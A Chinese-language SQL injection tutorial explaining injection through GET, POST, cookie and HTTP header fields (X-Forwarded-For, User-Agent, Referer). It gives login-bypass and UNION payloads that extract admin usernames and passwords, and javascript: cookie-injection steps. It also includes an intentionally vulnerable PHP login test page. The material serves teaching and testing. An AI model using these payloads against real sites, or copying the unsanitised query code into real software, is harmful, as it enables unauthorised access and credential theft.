1.1.2 mothod注入利用

本文将介绍四种提交方式的注入

• Get

• Post

• Cookie

• Http头

GET注入

提交数据的方式是 GET , 注入点的位置在 GET 参数部分。比如有这样的一个链接http://xxx.com/news.php?id=1 , id 是注入点。 之前的都是get注入，这里不再赘述，着重介绍下其他的注入

POST注入

使用 POST 方式提交数据，注入点位置在 POST 数据部分，常发生在表单中。

万能密码测试

' or 1=1#

猜字段数

' order by 4#

猜表名

'or 1=1 union select 1,2,3,4 #

猜内容

替换1,2,3为你想要获得的内容

'or 1=1 union select 1,version(),3,4 #

测试代码

<form action="" method="POST">
用户：<input name="u" type="test" /></br></br>
密码：<input name="p" type="test" /></br></br>
<input name="" type="submit" value="登录"/></br></br>
</form>

<?php
$username=$_POST['u'];
$password=$_POST['p'];
$conn=mysql_connect("127.0.0.1","root","root");
mysql_select_db("fendo",$conn);
$sql="select * from user where username='$username' and password='$password'";
$result=mysql_query($sql);
//数组遍历结果选择显示
    while($row = mysql_fetch_array($result)){
        echo "用户ID：".$row['id']."<br >";
        echo "用户名：".$row['username']."<br >";
        echo "用户密码：".$row['password']."<br >";
    }
echo '执行的sql语句为'.$sql;
mysql_close($conn);
?>

cookie注入

HTTP 请求的时候会带上客户端的 Cookie, 注入点存在 Cookie 当中的某个字段中。

Cookie注入简单来说就是利用Cookie而发起的注入攻击。从本质上来讲，Cookie注入与传统的SQL注入并无不同，两者都是针对数据库的注入，只是表现形式上略有不同罢了。

要想深入了解Cookie注入的成因，必须要了解ASP脚本中的request对象。它被用于从用户那里获取信息。Request对象的使用方法一般是这样的：request.[集合名称]（参数名称），比如获取从表单中提交的数据时可以这样写：request.form("参数名称")，但ASP中规定也可以省略集合名称，直接用这样的方式获取数据：request("参数名称")，当使用这样的方式获取数据时，ASP规定是按QueryString、Form、Cookies、ServerVariables的顺序来获取数据的。这样，当我们使用request("参数名称")方式获取客户端提交的数据，并且没有对使用request.cookies("参数名称")方式提交的数据进行过滤时，Cookie注入就产生了。

Cookie注入典型步骤

1.寻找形如“.asp?id=xx”类的带参数的URL。

2.去掉“id=xx”查看页面显示是否正常，如果不正常，说明参数在数据传递中是直接起作用的。

3.清空浏览器地址栏，输入“javascript:alert(document.cookie="id="+escape("xx"));”，按Enter键后弹出一个对话框，内容是“id=xx”，然后用原来的URL刷新页面，如果显示正常，说明应用使用Request("id")这种方式获取数据的。

4.重复上面的步骤，将常规SQL注入中的判断语句带入上面的URL：

    “javascript:alert(document.cookie="id="+escape("xx and 1=1"));” “javascript:alert(document.cookie="id="+escape("xx and 1=2"));”

和常规SQL注入一样，如果分别返回正常和不正常页面，则说明该应用存在注入漏洞，并可以进行cookie注入。

5.使用常规注入语句进行注入即可。

Cookie注入实战

1.寻找形如“.asp?id=xx”类的带参数的URL。

提示包好非法字符串,这是由于它对POST/GET进行了过滤。

2.去掉“id=xx”查看页面显示是否正常，如果不正常，说明参数在数据传递中是直接起作用的。

3.清空浏览器地址栏，输入“javascript:alert(document.cookie="id="+escape("xx"));”，按Enter键后弹出一个对话框，内容是“id=xx”，然后用原来的URL刷新页面，如果显示正常，说明应用使用Request("id")这种方式获取数据的。

4.重复上面的步骤，将常规SQL注入中的判断语句带入上面的

URL：“javascript:alert(document.cookie="id="+escape("xx and 1=1"));” URL：“javascript:alert(document.cookie="id="+escape("xx and 1=2"));”

和常规SQL注入一样，如果分别返回正常和不正常页面，则说明该应用存在注入漏洞，并可以进行cookie注入

猜解内容

javascript:alert(document.cookie="id="+escape("27 union select 1,username,password,4,5,6,7,8,9,10,11 from admin "));

http头注入

注入点在 HTTP 请求头部的某个字段中。比如存在 User-Agent 字段中。严格讲的话，Cookie 其实应该也是算头部注入的一种形式。因为在 HTTP 请求的时候，Cookie 是头部的一个字段。

常见的http注入的参数

1. HTTP_CLIENT_IP

2. ‘HTTP_X_FORWARDED_FOR’,

3. ‘HTTP_X_FORWARDED’,

4. ‘HTTP_X_CLUSTER_CLIENT_IP’,

5. ‘HTTP_FORWARDED_FOR’,

6. ‘HTTP_FORWARDED’,

7. ‘REMOTE_ADDR

8. User-agent

9. Referer

利用X-Forwarded-For进行sql注入

由于系统一般会采用String ip = request.getHeader("X-Forwarded-For");进行获取ip，然后注入者就可以通过X-Forwarded-For请求头信息就行伪造ip，当然了这个ip也可以是一些注入语句，如下

X-Forwarded-For:payload';WAITFOR DELAY '0:0:5'--
String sql = "select * from table where ip = '"+ip+"'";

那么我们得到的sql语句就会是这样

select * from table where ip = payload';WAITFOR DELAY '0:0:5'--'

注入测试

修改其中的X-Forward-Type的值

说明这个参数可控 将所需的SQL语句带入查询即可

这个头字段可以像下面这样简单地修改:

GET /index.php HTTP/1.1 Host: [host] X_FORWARDED_FOR :127.0.0.1' or 1=1#

这样的修改将会导致绕过安全认证。

User-agent

用户代理（user agent）是记录软件程序的客户端信息的HTTP头字段，他可以用来统计目标和违规协议。在HTTP头中应该包含它，这个字段的第一个空格前面是软件的产品名称，后面有一个可选的斜杠和版本号。 并不是所有的应用程序都会被获取到user-agent信息，但是有些应用程序利用它存储一些信息（如：购物车）。在这种情况下，我们就有必要研究下user-agent头存在的问题了。 HTTP查询实例：

GET /index.php HTTP/1.1 Host: [host] User-Agent: aaa' or 1/*

Referer

Referer是另外一个当应用程序没有过滤存储到数据库时，容易发生SQL注入的HTTP头。它是一个允许客户端指定的可选头部字段，通过它我们可以获取到提交请求URI的服务器情况。它允许服务器产生一系列的回退链接文档，像感兴趣的内容，日志等。它也允许跟踪那些坏链接以便维护。 例如：

GET /index.php HTTP/1.1 Host: [host] User-Agent: aaa' or 1/* Referer: http://www.yaboukir.com